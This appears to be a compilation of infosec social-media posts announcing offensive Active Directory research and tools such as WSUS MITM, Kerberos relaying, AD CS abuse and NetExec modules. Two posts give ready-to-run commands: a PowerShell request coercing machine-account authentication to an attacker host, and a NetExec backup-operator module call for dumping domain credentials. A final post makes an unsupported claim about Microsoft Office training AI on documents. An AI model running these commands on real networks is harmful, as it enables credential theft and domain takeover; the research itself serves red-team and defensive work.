Check out Titanis, my new C#-based protocol library! It features implementations of SMB and various Windows RPC protocols along with Kerberos and NTLM.
https://t.co/GC5wA2y3EO
gpoParser, which I presented at #leHACK2025 and #DEFCON, is available here: https://t.co/sHgmiOrPCV
It is a specialized utility designed to enumerate Group Policy Objects (GPOs) and identify potential security misconfigurations.
It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates.
Also includes ESC1 over Intune (in some cases).
https://t.co/Dm1x9ORW7Q
Oh, and a new tool for SCEP: https://t.co/mm9ASrBUKp
Yet another bloodhound ingestor for Linux based system and using ADWS as the main interface.
Built with @Sant0rryu , meet https://t.co/MgaCIVT5Dg.
You may check out the short blog post for more details.
https://t.co/CteI8qrTzH
Always a pleasure to participate in the NetExec workshop at @_leHACK_ organized by @mpgn_x64, @wil_fri3d & @_zblurx. I managed to complete both domains this year! Maybe a podium next year 👀🏆!?
Writeup link: https://t.co/6eEhKJoki9
#NetExec#lehack2025
I'm not sure everyone realizes it, but as it stands, if you have an Active Directory with default configurations, any machine (except DCs) that hasn't applied the June 10 patch can be compromised by any domain user.
Releasing a side project of mine: wsuks - automating the WSUS mitm attack🔥
https://t.co/92D4idVy7V
TL;DR:
If the Windows Server Update Service (WSUS) is configured to use HTTP instead of HTTPS, it's possible to take control of any Windows machine on your local network.
1/4🧵
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
NFS has not received much attention of the offensive security community in nearly a decade. Today, we are happy to share our research on the topic: https://t.co/iehDxiF46m. I'll give you a short overview in this thread 🧵 (1/5) #redteam#pentest
Thanks to @synacktiv's recent posts about Kerberos https://t.co/cJIAuKvP67 and recent PR's @_dirkjan 's https://t.co/aGKGxMuI1S tool it made me realize ELEVATE-2 is still in play where client push installation is in use.
The LLMNR response name spoofing pioneered by @tiraniddo and @Synacktiv does not seem to work with mDNS & NetBIOS 😢
But guess what! It works with DNS😯
🥳 Here's the new pretender release supporting Kerberos relaying via DHCPv6-DNS-Takeover: 🎉
https://t.co/2zhJlpBRvn
#infosec
imo way to complicated to extract the ntds, once you got a user with backup privilege group just do:
1⃣ nxc smb dc -u user -p pass -M backup_operator
🏆
So you want to exploit ADCS ESC8 with only netexec and ntlmrelayx ? Fear not my friend, I will show you how to do it 👇
NetExec now supports "Pass-the-Cert" as an authentication method, thanks to @_dirkjan original work on PKINITtools ⛱️
GIVEAWAY of my Offensive Rust course to 5 people who like and retweet this tweet.
More giveaways are coming soon.
Winner will be picked on 29th this month
https://t.co/1X5aHEekcL
#infosec#cybersecurity#hacking#rust
Santa's early w/ a new #BloodHoundBasics post!🎅
Looking for new Attack Paths to the domain? 🔎
BH v6.3 introduces CoerceToTGT.
The edge connects principals w/ unconstrained delegation to the domain, as attackers can use those to coerce privileged computers & retrieve their TGT.
Check out the kickoff to @hotnops' multi-part blog series on attacker tradecraft around the syncing mechanics between Active Directory & Entra. In this first part, he shows how complete control of an Entra user is equal to compromise of the on-prem user. https://t.co/gxHSg9HvZf
NetExec has a new Module: Timeroast🔥
In AD environments, the DC hashes NTP responses with the computer account NT hash. That means that you can request and brute force all computer accounts in a domain from an UNAUTHENTICATED perspective!
Implemented by @Disgame_
1/3🧵
Excited to share a tool I've been working on - ShadowHound.
ShadowHound is a PowerShell alternative to SharpHound for Active Directory enumeration, using native PowerShell or ADModule (ADWS). As a bonus I also talk about some MDI detections and how to avoid them
M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...
GitHub: https://t.co/zoN2fX6Hsc
Heads up: Microsoft Office, like many companies in recent months, has slyly turned on an “opt-out” feature that scrapes your Word and Excel documents to train its internal AI systems. This setting is turned on by default, and you have to manually uncheck a box in order to opt out. If you are a writer who uses MS Word to write any proprietary content (blog posts, novels, or any work you intend to protect with copyright and/or sell), you’re going to want to turn this feature off immediately.